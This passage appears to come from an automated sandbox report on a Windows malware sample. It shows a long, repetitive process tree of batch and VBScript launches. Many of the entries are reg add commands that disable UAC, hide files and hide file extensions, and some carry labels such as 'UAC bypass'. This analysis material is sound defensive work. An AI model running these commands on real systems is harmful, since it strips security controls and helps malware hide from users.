        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        82⤵
        UAC bypass
        
        PID:1912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AkgIwsUU.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        82⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        83⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        80⤵
        
        PID:1064
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        80⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        80⤵
        
        PID:3768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gYMkEIEw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        80⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        81⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xmgkcUoI.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        78⤵
        
        PID:744
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        79⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        78⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        78⤵
        
        PID:4644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        78⤵
        
        PID:3420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        78⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        76⤵
        
        PID:4948
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        77⤵
        
        PID:1476
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZYEEcIEw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        76⤵
        
        PID:4196
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        77⤵
        
        PID:2460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        76⤵
        Modifies registry key
        
        PID:4776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        76⤵
        
        PID:2852
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        74⤵
        
        PID:4708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        74⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        74⤵
        UAC bypass
        
        PID:1892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XYoMgIEQ.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        74⤵
        
        PID:4700
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        75⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        75⤵
        
        PID:3744
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        72⤵
        
        PID:2712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\piEcwokc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        72⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        73⤵
        
        PID:1244
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        72⤵
        Modifies registry key
        
        PID:3576
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        72⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LCkIcQMU.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        70⤵
        
        PID:4580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        71⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        71⤵
        
        PID:2296
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        70⤵
        UAC bypass
        
        PID:976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        70⤵
        Modifies registry key
        
        PID:1212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        70⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dSIgkUwg.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        68⤵
        
        PID:632
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        69⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        69⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        68⤵
        UAC bypass
        
        PID:3868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        68⤵
        
        PID:4188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        68⤵
        Modifies registry key
        
        PID:2564
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        69⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        66⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KaosEUkc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        66⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        67⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        66⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        66⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MeMMIAsc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        64⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        65⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        64⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        64⤵
        
        PID:3500
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        64⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AWAkcgkw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        62⤵
        
        PID:1920
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        63⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        62⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        62⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        62⤵
        Modifies registry key
        
        PID:4028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KsYsEUcg.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        60⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:4972
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        61⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        60⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        60⤵
        
        PID:5040
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        60⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2192
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        61⤵
        
        PID:3116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        58⤵
        
        PID:4428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        59⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gwooUAcM.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        58⤵
        
        PID:220
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        59⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        58⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        58⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OqAwYcMM.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        56⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        57⤵
        
        PID:496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        56⤵
        
        PID:4104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        56⤵
        
        PID:2928
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        57⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        56⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UmgIwQcg.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        54⤵
        
        PID:3340
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        55⤵
        
        PID:4752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        54⤵
        UAC bypass
        
        PID:4748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        54⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        54⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pUQUAAww.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        52⤵
        
        PID:4040
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        53⤵
        
        PID:4848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        52⤵
        UAC bypass
        
        PID:4228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        52⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        52⤵
        
        PID:3712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        50⤵
        
        PID:4024
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        50⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TeEMEssM.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        50⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        51⤵
        
        PID:3736
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        50⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        48⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hgcEUEgo.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        48⤵
        Modifies visibility of file extensions in Explorer
        
        PID:632
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        49⤵
        
        PID:780
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        48⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        48⤵
        Modifies registry key
        
        PID:2876
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        46⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VwksQsQk.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        46⤵
        
        PID:316
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        47⤵
        
        PID:2460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        46⤵
        
        PID:1476
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        46⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        44⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        44⤵
        
        PID:3460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        44⤵
        
        PID:4748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MaMsMYww.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        44⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        45⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        42⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:928
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        42⤵
        
        PID:844
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        43⤵
        UAC bypass
        
        PID:1492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        42⤵
        UAC bypass
        
        PID:4828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SuQwQEAQ.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        42⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        43⤵
        
        PID:1332
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        40⤵
        
        PID:976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        40⤵
        
        PID:4148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        40⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LuQgAkck.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        40⤵
        
        PID:3312
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        41⤵
        
        PID:696
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        41⤵
        
        PID:396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lsQwowks.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        38⤵
        
        PID:500
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        39⤵
        
        PID:4612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        38⤵
        
        PID:684
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        38⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        38⤵
        
        PID:632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        36⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:4912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        36⤵
        
        PID:2720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dwIIEIIg.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        36⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        37⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        36⤵
        
        PID:4000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        34⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        34⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        34⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WuQIcMUY.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        34⤵
        
        PID:1584
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        35⤵
        
        PID:368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        32⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        32⤵
        
        PID:736
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        32⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CeIMQoIo.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        32⤵
        
        PID:3080
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4680
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        33⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WgMosIkc.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        30⤵
        
        PID:3636
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        31⤵
        
        PID:4892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        30⤵
        UAC bypass
        
        PID:1904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        30⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        30⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\cmd.exe
        
